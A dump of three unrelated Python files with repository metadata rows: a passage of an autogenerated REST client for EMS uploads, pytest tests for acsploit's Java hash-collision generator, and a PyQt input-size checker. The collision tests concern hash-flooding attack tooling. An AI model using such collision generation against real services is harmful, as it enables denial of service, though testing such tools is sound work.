:param transfer_id: The ID of the upload, returned originally by the
upload start call.
:type transfer_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.finish_async.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400, 401, 404, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
if response.status_code == 400:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 404:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
finish_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/finish'}
def cancel_async(
self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
"""Cancels an existing upload in progress.
If successful, this call will delete the file in progress and set the
associated database record to canceled.
:param ems_system_id: The ID of the EMS system to which the client is
uploading.
:type ems_system_id: int
:param transfer_id: The ID of the upload, returned originally by the
upload start call.
:type transfer_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.cancel_async.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400, 401, 404, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadResult', response)
if response.status_code == 400:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 404:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
cancel_async.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/{transferId}/cancel'}
def get_uploads(
self, max_entries=None, custom_headers=None, raw=False, **operation_config):
"""Get a list of upload records from the server.
For administrative users, this will return a list of all uploads;
otherwise only the uploads associated
to the current user will be returned.
:param max_entries: The maximum number of entries to return; this is
capped at 50, and
50 will be used if it's not specified.
:type max_entries: int
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_uploads.metadata['url']
# Construct parameters
query_parameters = {}
if max_entries is not None:
query_parameters['maxEntries'] = self._serialize.query("max_entries", max_entries, 'int')
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 401, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('[AdiEmsWebApiV2DtoUploadUploadRecord]', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_uploads.metadata = {'url': '/v2/uploads'}
def get_upload_processing_status(
self, ems_system_id, transfer_id, custom_headers=None, raw=False, **operation_config):
"""Gets the EMS processing status for a single upload.
When using this route, make sure to use EMS system and upload IDs that
match. Results for IDs that do not
exist will still return valid results, but will indicate that the
uploading processing is incomplete,
which, while true, may be misleading.
:param ems_system_id: The ID of the EMS server to query for the
specified uploads.
:type ems_system_id: int
:param transfer_id: The ID of the upload for which to return status
information.
:type transfer_id: str
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_upload_processing_status.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int'),
'transferId': self._serialize.url("transfer_id", transfer_id, 'str')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
if custom_headers:
header_parameters.update(custom_headers)
# Construct and send request
request = self._client.get(url, query_parameters, header_parameters)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 401, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('AdiEmsWebApiV2DtoUploadUploadProcessingStatus', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_upload_processing_status.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/processing-status/{transferId}'}
def get_upload_processing_status_multiple(
self, ems_system_id, ids, custom_headers=None, raw=False, **operation_config):
"""Gets the EMS processing status for a set of uploads.
When using this route, make sure to use EMS system and upload IDs that
match. Results for IDs that do not
exist will still return valid results, but will indicate that the
uploading processing is incomplete,
which, while true, may be misleading.
:param ems_system_id: The ID of the EMS server to query for the
specified uploads.
:type ems_system_id: int
:param ids: The list of IDs of the upload for which to return status
information.
:type ids: list[str]
:param dict custom_headers: headers that will be added to the request
:param bool raw: returns the direct response alongside the
deserialized response
:param operation_config: :ref:`Operation configuration
overrides<msrest:optionsforoperations>`.
:return: object or ClientRawResponse if raw=true
:rtype: object or ~msrest.pipeline.ClientRawResponse
:raises:
:class:`HttpOperationError<msrest.exceptions.HttpOperationError>`
"""
# Construct URL
url = self.get_upload_processing_status_multiple.metadata['url']
path_format_arguments = {
'emsSystemId': self._serialize.url("ems_system_id", ems_system_id, 'int')
}
url = self._client.format_url(url, **path_format_arguments)
# Construct parameters
query_parameters = {}
# Construct headers
header_parameters = {}
header_parameters['Accept'] = 'application/json'
header_parameters['Content-Type'] = 'application/json; charset=utf-8'
if custom_headers:
header_parameters.update(custom_headers)
# Construct body
body_content = self._serialize.body(ids, '[str]')
# Construct and send request
request = self._client.post(url, query_parameters, header_parameters, body_content)
response = self._client.send(request, stream=False, **operation_config)
if response.status_code not in [200, 400, 401, 503]:
raise HttpOperationError(self._deserialize, response)
deserialized = None
if response.status_code == 200:
deserialized = self._deserialize('{AdiEmsWebApiV2DtoUploadUploadProcessingStatus}', response)
if response.status_code == 400:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 401:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if response.status_code == 503:
deserialized = self._deserialize('AdiEmsWebApiModelError', response)
if raw:
client_raw_response = ClientRawResponse(deserialized, response)
return client_raw_response
return deserialized
get_upload_processing_status_multiple.metadata = {'url': '/v2/ems-systems/{emsSystemId}/uploads/processing-status'}
| 42.929947 | 123 | 0.664301 | 2,620 | 24,513 | 6.045038 | 0.096947 | 0.040725 | 0.04243 | 0.053037 | 0.858 | 0.847645 | 0.842909 | 0.832428 | 0.825925 | 0.80812 | 0 | 0.012662 | 0.249337 | 24,513 | 570 | 124 | 43.005263 | 0.848052 | 0.332028 | 0 | 0.764259 | 1 | 0 | 0.132561 | 0.08693 | 0 | 0 | 0 | 0 | 0 | 1 | 0.034221 | false | 0 | 0.011407 | 0 | 0.114068 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
354ad24f8b314966a83f4e6deae2119a81e4fae9 | 2,492 | py | Python | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 107 | 2018-05-03T16:53:01.000Z | 2022-02-23T14:47:20.000Z | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 7 | 2019-04-28T00:41:35.000Z | 2021-05-04T20:35:54.000Z | test/exploits/hashes/collisions/test_java_fast.py | drjerry/acsploit | fbe07fb0eb651e3c5fc27a0dbdfcd0ec4c674381 | [
"BSD-3-Clause"
] | 16 | 2019-03-29T12:39:16.000Z | 2021-03-03T11:09:45.000Z | from exploits.hashes.collisions import java_fast
from exploits.hashes.collisions import java_common
from test.exploits.dummy_output import DummyOutput
from input.chars import CharGenerator
def test_run_small_collision_count():
output = DummyOutput()
n_collisions = 10
hash_table_size = 2**32
target = '42'
java_fast.options['n_collisions'] = n_collisions
java_fast.options['n_substrings'] = 100
java_fast.options['target_type'] = 'image'
java_fast.options['target'] = target
java_fast.options['hash_table_size'] = hash_table_size
java_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert java_common.java_hash(i, hash_table_size) == int(target)
def test_run_large_collision_count():
output = DummyOutput()
n_collisions = 10000
hash_table_size = 2**32
target = '42'
java_fast.options['n_collisions'] = n_collisions
java_fast.options['n_substrings'] = 10
java_fast.options['target_type'] = 'image'
java_fast.options['target'] = target
java_fast.options['hash_table_size'] = hash_table_size
java_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert java_common.java_hash(i, hash_table_size) == int(target)
def test_preimage():
output = DummyOutput()
n_collisions = 10
hash_table_size = 2**32
preimage_target = 'hello world'
java_fast.options['n_collisions'] = n_collisions
java_fast.options['n_substrings'] = 100
java_fast.options['target_type'] = 'preimage'
java_fast.options['target'] = preimage_target
java_fast.options['hash_table_size'] = hash_table_size
java_fast.run(CharGenerator(), output)
target = java_common.java_hash(preimage_target, hash_table_size)
assert output.count() == n_collisions
for i in output:
assert java_common.java_hash(i, hash_table_size) == target
def test_run_small_hash_table_size():
output = DummyOutput()
n_collisions = 10
hash_table_size = 100
target = '42'
java_fast.options['n_collisions'] = n_collisions
java_fast.options['target_type'] = 'image'
java_fast.options['n_substrings'] = 3
java_fast.options['target'] = target
java_fast.options['hash_table_size'] = hash_table_size
java_fast.run(CharGenerator(), output)
assert output.count() == n_collisions
for i in output:
assert java_common.java_hash(i, hash_table_size) == int(target)
| 35.6 | 71 | 0.7187 | 339 | 2,492 | 4.952802 | 0.132743 | 0.119119 | 0.178678 | 0.076236 | 0.836212 | 0.829661 | 0.751042 | 0.751042 | 0.725432 | 0.707564 | 0 | 0.018456 | 0.173756 | 2,492 | 69 | 72 | 36.115942 | 0.796989 | 0 | 0 | 0.721311 | 0 | 0 | 0.105939 | 0 | 0 | 0 | 0 | 0 | 0.131148 | 1 | 0.065574 | false | 0 | 0.065574 | 0 | 0.131148 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
1086b22b3414838d710c75b2beba93d826bce426 | 5,920 | py | Python | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | src/f_check_inputs.py | MeDIUM-FCL/MeDIUM | 07ab64ccd1a24e117548d6c968cbeb3992fc390e | [
"MIT"
] | null | null | null | def f_check_inputs(filename_meas, filename_modelpredictions, filename_combuncertainties, meas, ims_predictions, combined_uncertainties,checkboxvariable,numberofstage,numberofmeasperstage):
"""
Check if inputs provided have the same size for number of measurements
Developed by : Sai G.S. Pai (ETH Singapore)
Contact : saiganesh89@gmail.com
Date: July 22, 2020
INPUTS:
filename_meas : name of input measurements file (null if not yet provided by user)
filename_modelpredictions : name of input model predictions file (null if not yet provided by user)
filename_combuncertainties : name of input combined uncertainties file (null if not yet provided by user)
meas : measurement input provided
ims_predictions : ims predictions at measurement locations
combined_uncertainties : output of reading the uncertainties file
OUTPUTS:
check['value'] : numpy array with initial set of parameter values
check['message'] : numpy array of ims predictions at measurement points
NOTE:
Use the check['value'] if false to generate a warning message. Content of the warning message dialog is check['message']
Function does nothing when one of the inputs is not populated
"""
import numpy
from PyQt5 import QtWidgets
if checkboxvariable == 0:
check = {}
# if len(numpy.transpose(meas)) != 0 and len(numpy.transpose(ims_predictions)) != 0 and len(numpy.transpose(combined_uncertainties)) != 0:
if filename_meas and filename_modelpredictions and filename_combuncertainties:
print('first check is true')
if len(numpy.transpose(meas)) == len(numpy.transpose(ims_predictions)) == len(numpy.transpose(combined_uncertainties)):
check['value'] = True
check['message'] = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
brief_text = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
msgBox = QtWidgets.QMessageBox()
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText(brief_text)
msgBox.setWindowTitle('Information')
msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
returnValue = msgBox.exec()
if returnValue == QtWidgets.QMessageBox.Ok:
pass
else:
check['value'] = False
check['message'] = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)), len(numpy.transpose(combined_uncertainties)))
brief_text = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)), len(numpy.transpose(combined_uncertainties)))
msgBox = QtWidgets.QMessageBox()
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText(brief_text)
msgBox.setWindowTitle('Warning')
msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
returnValue = msgBox.exec()
if returnValue == QtWidgets.QMessageBox.Ok:
pass
return check
else:
check = {}
if filename_meas and filename_modelpredictions and filename_combuncertainties:
print('first check is true')
totalmeas_uncer = numberofstage*numberofmeasperstage
if len(numpy.transpose(meas)) == totalmeas_uncer == len(numpy.transpose(ims_predictions)):
check['value'] = True
check['message'] = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
brief_text = 'Congratulations! All necessary inputs provided. \nProceed to the data-interpretation tab.'
msgBox = QtWidgets.QMessageBox()
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText(brief_text)
msgBox.setWindowTitle('Information')
msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
returnValue = msgBox.exec()
if returnValue == QtWidgets.QMessageBox.Ok:
pass
else:
check['value'] = False
check[
'message'] = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(
len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)),
len(numpy.transpose(combined_uncertainties)))
brief_text = 'ERROR\nNumber of measurements according to measurements file = {}\nNumber of measurements according to ims file = {}\nNumber of measurements according to uncertainties file = {}'.format(
len(numpy.transpose(meas)), len(numpy.transpose(ims_predictions)),
len(numpy.transpose(combined_uncertainties)))
msgBox = QtWidgets.QMessageBox()
msgBox.setIcon(QtWidgets.QMessageBox.Information)
msgBox.setText(brief_text)
msgBox.setWindowTitle('Warning')
msgBox.setStandardButtons(QtWidgets.QMessageBox.Ok)
returnValue = msgBox.exec()
if returnValue == QtWidgets.QMessageBox.Ok:
pass
return check
| 62.315789 | 334 | 0.651351 | 596 | 5,920 | 6.401007 | 0.201342 | 0.04194 | 0.089122 | 0.094364 | 0.749672 | 0.708781 | 0.708781 | 0.708781 | 0.700917 | 0.680996 | 0 | 0.003002 | 0.268412 | 5,920 | 94 | 335 | 62.978723 | 0.877857 | 0.195777 | 0 | 0.820896 | 0 | 0.059701 | 0.253419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.014925 | false | 0.059701 | 0.029851 | 0 | 0.074627 | 0.029851 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.